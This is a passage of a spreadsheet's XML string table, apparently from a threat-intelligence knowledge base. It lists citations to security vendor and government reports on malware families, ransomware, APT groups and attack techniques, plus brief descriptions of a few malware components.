    <t>Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020.</t>
  </si>
  <si>
    <t>Frankoff, S., Hartley, B. (2018, November 14). Big Game Hunting: The Evolution of INDRIK SPIDER From Dridex Wire Fraud to BitPaymer Targeted Ransomware. Retrieved January 6, 2021.</t>
  </si>
  <si>
    <t>Adam Kozy. (2018, August 30). Two Birds, One Stone Panda. Retrieved August 24, 2021.</t>
  </si>
  <si>
    <t>Manoj Ahuje. (2022, January 31). CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit. Retrieved July 6, 2022.</t>
  </si>
  <si>
    <t>Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021.</t>
  </si>
  <si>
    <t>Crowdstrike. (n.d.). Mythic Leopard. Retrieved October 6, 2021.</t>
  </si>
  <si>
    <t>Crowdstrike. (2022, March 1). Decryptable PartyTicket Ransomware Reportedly Targeting Ukrainian Entities. Retrieved March 1, 2022.</t>
  </si>
  <si>
    <t>Busselen, M. (2020, April 7). On-demand Webcast: CrowdStrike Experts on COVID-19 Cybersecurity Challenges and Recommendations. Retrieved May 20, 2020.</t>
  </si>
  <si>
    <t>CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Crowdstrike. (2022, January 19). Technical Analysis of the WhisperGate Malicious Bootloader. Retrieved March 10, 2022.</t>
  </si>
  <si>
    <t>CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ tolko s razreshenija S-a. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer):  A complex malware for targeted attacks. Retrieved September 6, 2018.</t>
  </si>
  <si>
    <t>Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.</t>
  </si>
  <si>
    <t>Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.</t>
  </si>
  <si>
    <t>Hod Gavriel. (2019, November 21). Dtrack: In-depth analysis of APT on a nuclear power plant. Retrieved January 20, 2021.</t>
  </si>
  <si>
    <t>Gavriel, H. &amp; Erbesfeld, B. (2018, April 11). New ‘Early Bird’ Code Injection Technique Discovered. Retrieved May 24, 2018.</t>
  </si>
  <si>
    <t>Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>CyberESI. (2011). TROJAN.GTALK. Retrieved June 29, 2015.</t>
  </si>
  <si>
    <t>Shoorbajee, Z. (2018, November 29). Accenture: Russian hackers using Brexit talks to disguise phishing lures. Retrieved July 16, 2019.</t>
  </si>
  <si>
    <t>Lyngaas, S. (2021, February 4). Meet Babuk, a ransomware attacker blamed for the Serco breach. Retrieved August 11, 2021.</t>
  </si>
  <si>
    <t>Bing, C. (2017, October 16). Middle Eastern hacking group is using FinFisher malware to conduct international espionage. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Waterman, S. (2017, October 16). Fin7 weaponization of DDE is just their latest slick move, say researchers. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Reiner, S. (2017, November 21). Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, 2019.</t>
  </si>
  <si>
    <t>Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2020, July 16). A BAZAR OF TRICKS: FOLLOWING TEAM9’S DEVELOPMENT CYCLES. Retrieved November 18, 2020.</t>
  </si>
  <si>
    <t>Cybereason. (2022, August 17). Bumblebee Loader – The High Road to Enterprise Domain Control. Retrieved August 29, 2022.</t>
  </si>
  <si>
    <t>Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021.</t>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2020, December 23). Cybereason vs. Clop Ransomware. Retrieved May 11, 2021.</t>
  </si>
  <si>
    <t>Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.</t>
  </si>
  <si>
    <t>Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021.</t>
  </si>
  <si>
    <t>Sternfeld, U. (2016). Dissecting Domain Generation Algorithms: Eight Real World DGA Variants. Retrieved February 18, 2019.</t>
  </si>
  <si>
    <t>Rochberger, L. (2020, November 26). Cybereason vs. Egregor Ransomware. Retrieved December 30, 2020.</t>
  </si>
  <si>
    <t>Dahan, A. et al. (2020, November 2). Back to the Future: Inside the Kimsuky KGH Spyware Suite. Retrieved November 6, 2020.</t>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2019, June 13). New Pervasive Worm Exploiting Linux Exim Server Vulnerability. Retrieved June 24, 2020.</t>
  </si>
  <si>
    <t>Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.</t>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker Ransomware. Retrieved June 23, 2021.</t>
  </si>
  <si>
    <t>Amit Serper. (2016). Cybereason Lab Analysis OSX.Pirrit. Retrieved December 10, 2021.</t>
  </si>
  <si>
    <t>Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2022, May 4). Operation CuckooBees: Deep-Dive into Stealthy Winnti Techniques. Retrieved September 22, 2022.</t>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2022, February 1). PowerLess Trojan: Iranian APT Phosphorus Adds New PowerShell Backdoor for Espionage. Retrieved June 1, 2022.</t>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2019, June 25). Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers. Retrieved July 18, 2019.</t>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2022, February 1). StrifeWater RAT: Iranian APT Moses Staff Adds New Trojan to Ransomware Operations. Retrieved August 15, 2022.</t>
  </si>
  <si>
    <t>Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020.</t>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2022, February 15). Cybereason vs. WhisperGate and HermeticWiper. Retrieved March 10, 2022.</t>
  </si>
  <si>
    <t>Cyberint. (2021, May 25). Qakbot Banking Trojan. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020.</t>
  </si>
  <si>
    <t>Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral movement via DCOM. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.</t>
  </si>
  <si>
    <t>NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.</t>
  </si>
  <si>
    <t>Cybleinc. (2020, October 31). Egregor Ransomware – A Deep Dive Into Its Activities and Techniques. Retrieved December 29, 2020.</t>
  </si>
  <si>
    <t>Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021.</t>
  </si>
  <si>
    <t>Cybleinc. (2021, January 21). Conti Ransomware Resurfaces, Targeting Government &amp; Large Organizations. Retrieved April 13, 2021.</t>
  </si>
  <si>
    <t>Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020.</t>
  </si>
  <si>
    <t>Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.</t>
  </si>
  <si>
    <t>Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.</t>
  </si>
  <si>
    <t>The Cylance Threat Research Team. (2017, March 22). El Machete's Malware Attacks Cut Through LATAM. Retrieved September 13, 2019.</t>
  </si>
  <si>
    <t>Gross, J. and Walter, J.. (2016, January 12). Puttering into the Future.... Retrieved January 22, 2016.</t>
  </si>
  <si>
    <t>Cylance. (2015, April 13). Redirect to SMB. Retrieved December 21, 2017.</t>
  </si>
  <si>
    <t>Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Livelli, K, et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019.</t>
  </si>
  <si>
    <t>Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.</t>
  </si>
  <si>
    <t>Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Gold, B. (2020, April 27). Cynet Detection Report: Ragnar Locker Ransomware. Retrieved June 29, 2020.</t>
  </si>
  <si>
    <t>Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019.</t>
  </si>
  <si>
    <t>Cyware. (2019, May 29). Cyber attackers leverage tunneling service to drop Lokibot onto victims’ systems. Retrieved September 15, 2020.</t>
  </si>
  <si>
    <t>Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Banerd, W. (2019, April 30). 10 of the Best Open Source Threat Intelligence Feeds. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>JinQuan, MaDongZe, TuXiaoYi, and LiHao. (2021, February 10). Windows kernel zero-day exploit (CVE-2021-1732) is used by BITTER APT in targeted attack. Retrieved June 1, 2022.</t>
  </si>
  <si>
    <t>Delpy, B. &amp; LE TOUX, V. (n.d.). DCShadow. Retrieved March 20, 2018.</t>
  </si>
  <si>
    <t>Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>Maldonado, D., McGuffin, T. (2016, August 6). Sticky Keys to the Kingdom. Retrieved July 5, 2017.</t>
  </si>
  <si>
    <t>DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.</t>
  </si>
  <si>
    <t>DFIR Report. (2021, December 13). Diavol Ransomware. Retrieved March 9, 2022.</t>
  </si>
  <si>
    <t>THe DFIR Report. (2020, November 23). PYSA/Mespinoza Ransomware. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022.</t>
  </si>
  <si>
    <t>The DFIR Report. (2022, May 9). SEO Poisoning – A Gootloader Story. Retrieved September 30, 2022.</t>
  </si>
  <si>
    <t>The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.</t>
  </si>
  <si>
    <t>The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>The DFIR Report. (2020, October 8). Ryuk’s Return. Retrieved October 9, 2020.</t>
  </si>
  <si>
    <t>FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.</t>
  </si>
  <si>
    <t>DHS/CISA. (2020, October 28). Ransomware Activity Targeting the Healthcare and Public Health Sector. Retrieved October 28, 2020.</t>
  </si>
  <si>
    <t>Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Based on similar descriptions of functionality, it appears S0145, as named by FireEye, is the same as the first stages of a backdoor named DNSMessenger by Cisco's Talos Intelligence Group. However, FireEye appears to break DNSMessenger into two parts: S0145 and S0146. (Citation: Cisco DNSMessenger March 2017) (Citation: FireEye FIN7 March 2017)</t>
  </si>
  <si>
    <t>DOJ. (2020, August 26). San Jose Man Pleads Guilty To Damaging Cisco’s Network. Retrieved December 15, 2020.</t>
  </si>
  <si>
    <t>United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>Department of Justice. (2018, August 01). HOW FIN7 ATTACKED AND STOLE DATA. Retrieved August 24, 2018.</t>
  </si>
  <si>
    <t>Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.</t>
  </si>
  <si>
    <t>DOJ. (2018, March 23). U.S. v. Rafatnejad et al . Retrieved February 3, 2021.</t>
  </si>
  <si>
    <t>DOJ. (2020, September 17). Department of Justice and Partner Departments and Agencies Conduct Coordinated Actions to Disrupt and Deter Iranian Malicious Cyber Activities Targeting the United States and the Broader International Community. Retrieved December 10, 2020.</t>
  </si>
  <si>
    <t>Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.</t>
  </si>
  <si>
    <t>Department of Justice. (2021, February 17). Three North Korean Military Hackers Indicted in Wide-Ranging Scheme to Commit Cyberattacks and Financial Crimes Across the Globe. Retrieved June 9, 2021.</t>
  </si>
  <si>
    <t>Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.</t>
  </si>
  <si>
    <t>The DRIFTWOOD component is a Perl2Exe compiled Perl script used by G0053 after they have identified data of interest on victims. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)</t>
  </si>
  <si>
    <t>The DUEBREW component is a Perl2Exe binary launcher. (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)</t>
  </si>
  <si>
    <t>Manea, D.. (2019, May 25). Emotet v4 Analysis. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Martin Mulazzani, Sebastian Schrittwieser, Manuel Leithner, Markus Huber, and Edgar Weippl. (2011, August). Dark Clouds on the Horizon: Using Cloud Storage as Attack Vector and Online Slack Space. Retrieved July 14, 2022.</t>
  </si>
  <si>
    <t>Higgins, K. (2019, January 30). Iran Ups its Traditional Cyber Espionage Tradecraft. Retrieved May 22, 2020.</t>
  </si>
  <si>
    <t>Chickowski, E. (2015, February 10). Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole. Retrieved September 13, 2018.</t>
  </si>
  <si>
    <t>Higgins, K. (2015, October 13). Prolific Cybercrime Gang Favors Legit Login Credentials. Retrieved October 4, 2017.</t>
  </si>
  <si>
    <t>Kelly Jackson Higgins. (2021, January 7). FireEye's Mandia: 'Severity-Zero Alert' Led to Discovery of SolarWinds Attack. Retrieved April 18, 2022.</t>
  </si>
  <si>
    <t>Ramarcus Baylor. (2021, May 12). DarkSide Ransomware Gang: An Overview. Retrieved August 30, 2022.</t>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2021, April 1). Cybereason vs. Darkside Ransomware. Retrieved August 18, 2021.</t>
  </si>
  <si>
    <t>Mimoso, M.. (2014, June 18). Hacker Puts Hosting Service Code Spaces Out of Business. Retrieved December 15, 2020.</t>
  </si>
  <si>
    <t>Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.</t>
  </si>
  <si>
    <t>Davidson, L. (n.d.). Windows 7 UAC whitelist. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. Retrieved August 8, 2019.</t>
  </si>
  <si>
    <t>Debian Policy Manual v4.6.1.1. (2022, August 14). Package maintainer scripts and installation procedure. Retrieved September 27, 2022.</t>
  </si>
  <si>
    <t>Bezroutchko, A. (2019, November 19). NBTscan man page. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Kellie Eickmeyer. (2022, February 7). Helping users stay safe: Blocking internet macros by default in Office. Retrieved February 7, 2022.</t>
  </si>
  <si>
    <t>Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled Tasks. Retrieved July 5, 2022.</t>
  </si>
  <si>
    <t>Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019.</t>
  </si>
  <si>
    <t>Carvey, H.. (2014, September 2). Where you AT?: Indicators of lateral movement using at.exe on Windows 7 systems. Retrieved January 25, 2016.</t>
  </si>
  <si>
    <t>SecureWorks. (2013). The Lifecycle of Peer-to-Peer (Gameover) ZeuS. Retrieved August 19, 2015.</t>
  </si>
  <si>
    <t>Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.</t>
  </si>
  <si>
    <t>Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.</t>
  </si>
  <si>
    <t>Dell SecureWorks Counter Threat Unit Special Operations Team. (2015, May 28). Living off the Land. Retrieved January 26, 2016.</t>
  </si>
  <si>
    <t>Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.</t>
  </si>
  <si>
    <t>Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.</t>
  </si>
  <si>
    <t>Dell SecureWorks. (2013, March 21). Wiper Malware Analysis Attacking Korean Financial Sector. Retrieved May 13, 2015.</t>
  </si>
  <si>
    <t>Torello, A. &amp; Guibernau, F. (n.d.). Environment Awareness. Retrieved May 18, 2021.</t>
  </si>
  <si>
    <t>Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020.</t>
  </si>
  <si>
    <t>Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017.</t>
  </si>
  <si>
    <t>Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019.</t>
  </si>
  <si>
    <t>Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020.</t>
  </si>
  <si>
    <t>Deply, B. (n.d.). Mimikatz. Retrieved September 29, 2015.</t>
  </si>
  <si>
    <t>Dept. of Treasury. (2020, September 17). Treasury Sanctions Cyber Actors Backed by Iranian Intelligence. Retrieved December 10, 2020.</t>
  </si>
  <si>
    <t>Amazon Web Services, Inc. . (2022). DescribeSecurityGroups. Retrieved January 28, 2022.</t>
  </si>
  <si>
    <t>Apple. (n.d.). Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>Detectify. (2016, April 28). Slack bot token leakage exposing business critical information. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Gary Golomb. (n.d.). Threat Hunting Series: Detecting Command &amp; Control in the Cloud. Retrieved July 8, 2022.</t>
  </si>
  <si>
    <t xml:space="preserve"> Aaron Greetham. (2021, May 27). Detecting Rclone – An Effective Tool for Exfiltration. Retrieved August 30, 2022.</t>
  </si>
  <si>
    <t>Stevens, D. (2017, November 13). WebDAV Traffic To Malicious Sites. Retrieved December 21, 2017.</t>
  </si>
  <si>
    <t>Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019.</t>
  </si>
  <si>
    <t>die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12, 2020.</t>
  </si>
  <si>
    <t>DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021.</t>
  </si>
  <si>
    <t>The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>The DigiTrust Group. (2017, January 01). NanoCore Is Not Your Average RAT. Retrieved November 9, 2018.</t>
  </si>
  <si>
    <t>Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.</t>
  </si>
  <si>
    <t>Swisscom &amp; Digital Shadows. (2017, September 6). Content Delivery Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What You Can Do About It. Retrieved October 20, 2020.</t>
  </si>
  <si>
    <t>Roger Dingledine, Nick Mathewson and Paul Syverson. (2004). Tor: The Second-Generation Onion Router. Retrieved December 21, 2017.</t>
  </si>
  <si>
    <t>Grafnetter, M. (2015, October 26). Retrieving DPAPI Backup Keys from Active Directory. Retrieved December 19, 2017.</t>
  </si>
  <si>
    <t>wordmann. (2022, February 8). Disable Disc Imgage. Retrieved February 8, 2022.</t>
  </si>
  <si>
    <t xml:space="preserve"> dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.</t>
  </si>
  <si>
    <t>US District Court Southern District of New York. (2018, December 17). United States v. Zhu Hua Indictment. Retrieved December 17, 2020.</t>
  </si>
  <si>
    <t>Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved March 31, 2021.</t>
  </si>
  <si>
    <t>Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021.</t>
  </si>
  <si>
    <t>Docker. ( null). Docker Engine API v1.41 Reference - Build an Image. Retrieved March 30, 2021.</t>
  </si>
  <si>
    <t>Docker. (n.d.). Docker Engine API v1.41 Reference - Container. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>Docker. (n.d.). DockerD CLI. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>Docker. (n.d.). Protect the Docker Daemon Socket. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>docker docs. (n.d.). Containers. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Docker. (n.d.). Docker run reference. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>Docker. (n.d.). Docker Exec. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>Docker. (n.d.). Docker Images. Retrieved April 6, 2021.</t>
  </si>
  <si>
    <t>Docker. (n.d.). Docker Overview. Retrieved March 30, 2021.</t>
  </si>
  <si>
    <t>Krebs, B. (2018, November 13). That Domain You Forgot to Renew? Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.</t>
  </si>
  <si>
    <t>TheWover. (2019, May 9). donut. Retrieved March 25, 2022.</t>
  </si>
  <si>
    <t>Dormann, W. (2019, September 4). The Dangers of VHD and VHDX Files. Retrieved March 16, 2021.</t>
  </si>
  <si>
    <t>Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.</t>
  </si>
  <si>
    <t>Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.</t>
  </si>
  <si>
    <t>Dragos. (2020, February 3). EKANS Ransomware and ICS Operations. Retrieved February 9, 2021.</t>
  </si>
  <si>
    <t>Dragos. (2017, January 1). ELECTRUM Threat Profile. Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>Kent Backman. (2021, May 18). When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.</t>
  </si>
  <si>
    <t>Dragos. (n.d.). Hexane. Retrieved October 27, 2019.</t>
  </si>
  <si>
    <t>Slowik, J.. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved January 28, 2021.</t>
  </si>
  <si>
    <t>Dragos. (n.d.). PARISITE. Retrieved December 21, 2020.</t>
  </si>
  <si>
    <t>Dragos, Inc. (2018, August 2). RASPITE. Retrieved November 26, 2018.</t>
  </si>
  <si>
    <t>Dragos. (null). TALONITE. Retrieved February 25, 2021.</t>
  </si>
  <si>
    <t>Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021.</t>
  </si>
  <si>
    <t>Dragos. (n.d.). WASSONITE. Retrieved January 20, 2021.</t>
  </si>
  <si>
    <t>Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>drakonia. (2022, August 10). HInvoke and avoiding PInvoke. Retrieved August 22, 2022.</t>
  </si>
  <si>
    <t>ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.</t>
  </si>
  <si>
    <t>ClearSky Cybersecurity. (2016, June 9). Operation DustySky - Part 2. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Anthony Spadafora. (2021, June 11). EA hack reportedly used stolen cookies and Slack to target gaming giant. Retrieved May 31, 2022.</t>
  </si>
  <si>
    <t>Galperin, E., Et al.. (2016, August). I Got a Letter From the Government the Other Day.... Retrieved April 25, 2018.</t>
  </si>
  <si>
    <t>Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019.</t>
  </si>
  <si>
    <t>Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019.</t>
  </si>
  <si>
    <t>Howard Oakley. (2020, October 24). There's more to files than data: Extended Attributes. Retrieved October 12, 2021.</t>
  </si>
  <si>
    <t>hoakley. (2018, May 22). Running at startup: when to use a Login Item or a LaunchAgent/LaunchDaemon. Retrieved October 5, 2021.</t>
  </si>
  <si>
    <t>O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020.</t>
  </si>
  <si>
    <t>Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS. Retrieved December 8, 2017.</t>
  </si>
  <si>
    <t>Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved May 18, 2016.</t>
  </si>
  <si>
    <t>Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.</t>
  </si>
  <si>
    <t>Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021</t>
  </si>
  <si>
    <t>M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021.</t>
  </si>
  <si>
    <t>Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020.</t>
  </si>
  <si>
    <t>ESET Research. (2019, April 30). Buhtrap backdoor and Buran ransomware distributed via major advertising platform. Retrieved May 11, 2020.</t>
  </si>
  <si>
    <t>ESET. (2022, March 15). CaddyWiper: New wiper malware discovered in Ukraine. Retrieved March 23, 2022.</t>
  </si>
  <si>
    <t>Matrosov, A., Rodionov, E., Volkov, D., Harley, D. (2012, March 2). Win32/Carberp When You’re in a Black Hole, Stop Digging. Retrieved July 15, 2020.</t>
  </si>
  <si>
    <t>ESET. (2017, March 30). Carbon Paper: Peering into Turla’s second stage backdoor. Retrieved November 7, 2018.</t>
  </si>
  <si>
    <t>ESET Research. (2019, October 3). Casbaneiro: peculiarities of this banking Trojan that affects Brazil and Mexico. Retrieved September 23, 2021.</t>
  </si>
  <si>
    <t>Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.</t>
  </si>
  <si>
    <t>Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.</t>
  </si>
  <si>
    <t>M.Léveillé, M., Cherepanov, A.. (2022, January 25). Watering hole deploys new macOS malware, DazzleSpy, in Asia. Retrieved May 6, 2022.</t>
  </si>
  <si>
    <t>Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.</t>
  </si>
  <si>
    <t>M.Léveillé, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019.</t>
  </si>
  <si>
    <t>Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update . Retrieved February 10, 2021.</t>
  </si>
  <si>
    <t>Perez, D.. (2018, December 28). Analysis of the latest Emotet propagation campaign. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>ESET . (2018, November 9). Emotet launches major new spam campaign. Retrieved March 25, 2019.</t>
  </si>
  <si>
    <t>Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021.</t>
  </si>
  <si>
    <t>Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021.</t>
  </si>
  <si>
